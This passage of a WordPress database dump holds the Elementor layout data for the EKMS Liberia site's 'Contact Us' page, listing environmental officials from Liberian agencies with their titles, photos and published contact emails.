a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23342,3390,'_elementor_edit_mode','builder'),(23343,3390,'_elementor_template_type','wp-page'),(23344,3390,'_elementor_version','3.0.16'),(23345,3390,'_wp_page_template','default'),(23346,3390,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\nManager, ESIA\\nDepartment of Compliance and Enforcement\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries 